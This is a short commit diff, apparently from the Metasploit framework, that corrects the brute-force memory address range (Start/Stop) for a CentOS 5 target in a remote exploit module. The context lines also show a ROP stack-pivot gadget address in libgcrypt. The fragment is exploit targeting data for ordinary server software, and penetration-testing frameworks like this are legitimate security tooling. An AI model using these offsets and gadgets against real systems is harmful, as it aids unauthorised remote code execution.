typo in centos5 range

unstable
m m 2012-10-31 18:28:26 +01:00
parent f7481b160c
commit e170c1e3e3
1 changed files with 2 additions and 2 deletions

View File

@ -138,8 +138,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Offset' => 0x11c0,
'Ropname' => '3.5.10-0.107.el5 on CentOS 5',
'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2
'Start' => 0xb6962000 ,
'Stop' => 0xb6a61000 ,
'Start' => 0x0037c000 ,
'Stop' => 0x09e73000 ,
'Step' => 0x1000,
}
]